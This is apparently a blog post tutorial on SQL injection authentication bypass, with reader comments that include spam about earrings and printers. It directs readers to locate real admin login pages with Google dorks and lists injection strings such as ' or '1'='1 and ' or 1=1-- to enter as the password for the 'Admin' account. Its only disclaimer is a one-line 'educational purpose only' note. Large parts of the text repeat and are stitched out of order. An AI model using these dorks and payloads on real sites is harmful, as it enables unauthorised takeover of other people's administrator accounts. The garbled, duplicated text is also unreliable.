Basic sql injection
Gaining authentication bypass on an admin account.
First we need to find a site, start by opening Google.
Now we have to use Google dork:
There is a large number of Google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Gaining authentication bypass on an admin account.
First we need to find a site, start by opening Google.
Now we have to use Google dork:
There is a large number of Google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
there are many more but these are the best ones that i know .So your input should look like this
username:Admin
password:'or'1'='1
So click submit and you'r in.
NOTE: All sites are not vulnerable.
Note: Don't use this method for hacking . This article is for educational purpose only.
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
there are many more but these are the best ones that i know .So your input should look like this
username:Admin
password:'or'1'='1
So click submit and you'r in.
NOTE: All sites are not vulnerable.
Note: Don't use this method for hacking . This article is for educational purpose only.
It is one of the best blog for Ethical Hacking Training and Tricks, Thanks to update new new information, keep it up,,,,
ReplyDeleteSysap Technologies thanks for your comment . do contact me if you need any help regarding hacking , web hosting , server side issue and all technical stuff . :) :) :)
ReplyDeleteSince 2004, we have been offering unusual earrings, ear accessories and cool ear jewelry to customers around the world. Did you ask ... Where can I get Ear Cuffs? Lenusa's Earrings offers many different styles of designer ear cuffs and ear wraps for both, pierced and non pierced ears. Unique earrings for women and for guys…
ReplyDeleteCoolest Fashion Ear Rings ever!!!
I found so many interesting stuff in your blog especially its discussion. From the tons of comments on your articles, I guess I am not the only one having all the enjoyment here! keep up the good work...
ReplyDeleteall in one printer